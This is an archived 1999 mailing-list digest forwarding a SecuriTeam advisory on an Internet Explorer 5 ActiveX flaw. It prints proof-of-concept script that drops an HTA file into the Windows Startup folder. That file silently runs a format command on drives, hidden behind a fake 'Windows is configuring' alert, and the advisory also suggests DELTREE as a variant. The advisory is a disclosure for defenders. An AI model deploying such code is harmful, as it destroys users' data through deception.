>Mailing-List: list [EMAIL PROTECTED]; contact 
>[EMAIL PROTECTED]
>Date: 30 Aug 1999 07:00:51 -0000
>Delivered-To: mailing list [EMAIL PROTECTED]
>List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
>From: [EMAIL PROTECTED]
>Reply-to: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Subject: [cybercrime-alerts] Digest Number 27
>X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id 
>DAA20599
>
>
>--------------------------- ONElist Sponsor ----------------------------
>
>ATTENTION ONElist MEMBERS:  Get your ONElist news!
>Join our MEMBER NEWSLETTER here:
><a href=" http://clickme.onelist.com/ad/newsletter3 ">Click Here</a>
>
>------------------------------------------------------------------------
>This e-mail via the CYBERCRIME-ALERTS list at http://theMezz.com/alerts
>Subscribe:
>mailto:[EMAIL PROTECTED] 
>UnSubscribe:
>mailto:[EMAIL PROTECTED] 
>Free NewsLetter:
>http://theMezz.com/news
>------------------------------------------------------------------------
>
>There is 1 message in this issue.
>
> Topics in today's digest:
>
>      1. Internet Explorer code that formats local drives 
>           From: [EMAIL PROTECTED]
>
>
>___________________________________________________________________________
____
>___________________________________________________________________________
____
>
>Message: 1
>   Date: Mon, 30 Aug 1999 02:52:52 -0700
>   From: [EMAIL PROTECTED]
>Subject: Internet Explorer code that formats local drives 
>
>
>The following security advisory is sent to the securiteam mailing list,
>and can be found at the
>SecuriTeam web site: http://www.securiteam.com 
>
>Internet Explorer code that formats
>local drives 
>
>------------------------------------------------------------ 
>
>In a previous article (A flaw in IE 5.0 ActiveX control allows executing
>programs) we
>explained how hta (HTML application) code in a web page can be used to
>attack machines
>visiting a certain web site. 
>We received another dangerous example of this flaw, but in this
>demonstration the local hard
>drives are formatted, without the user's intervention or knowledge. 
>
>****************************** 
>
>The following was reported to us by Christian Salvarrey: 
>
>Using the following code (note that the code applies for the Spanish
>Windows '98. In order
>for it to work on an English Windows '98, certain obvious changes should
>be applied): 
>
><object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> 
></object> 
><SCRIPT> 
>scr.Reset(); 
>scr.Path="C:\\windows\\Men� inicio\\Programas\\Inicio\\automat.hta"; 
>scr.Doc="<object id='wsh'
>classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Ru
>n('start
>/m format a: /q /autotest /u');alert('IMPORTANT : Windows is configuring
>the system. Plase
>do not interrupt this process.');</"+"SCRIPT>"; 
>scr.write(); 
>
>I was able to format my D: drive, and A: drive. (I didn't test it on my
>C: drive for obvious
>reasons). 
>
>The code does as follows: 
>1) Using START /m (Spanish Win98 version) the program starts minimized,
>so the user can't
>see what's going on. 
>2) Using the undocumented parameter /AUTOTEST, it's possible to run
>FORMAT.COM
>on any drive automatically (without user intervention) 
>3) The alert message can say something like "IMPORTANT : Windows is
>configuring the
>system. Please do not interrupt this process." so the user pays
>attention to that first. 
>
>This can be used to hide the fact that the minimized window's title says
>FORMAT, which is
>the only giveaway in this procedure. 
>
>Obviously, this is a very dangerous flaw, since you can FORMAT, or use
>DELTREE in the
>C:\MY DOCUMENTS or C:\WINDOWS folders to erase them also.
>
>
>___________________________________________________________________________
____
>___________________________________________________________________________
____
-------
AFLHI 058009990407128029/089802 


    milis ini didukung oleh :
 >> http://www.indolinux.com - dunia linux indonesia
 -------------------------------------------------------------------
 untuk berhenti kirim  email  ke  [EMAIL PROTECTED]
 untuk melihat peraturan kirim email  ke  [EMAIL PROTECTED]
 arsip berada di  http://www.mail-archive.com/[email protected]
 

Kirim email ke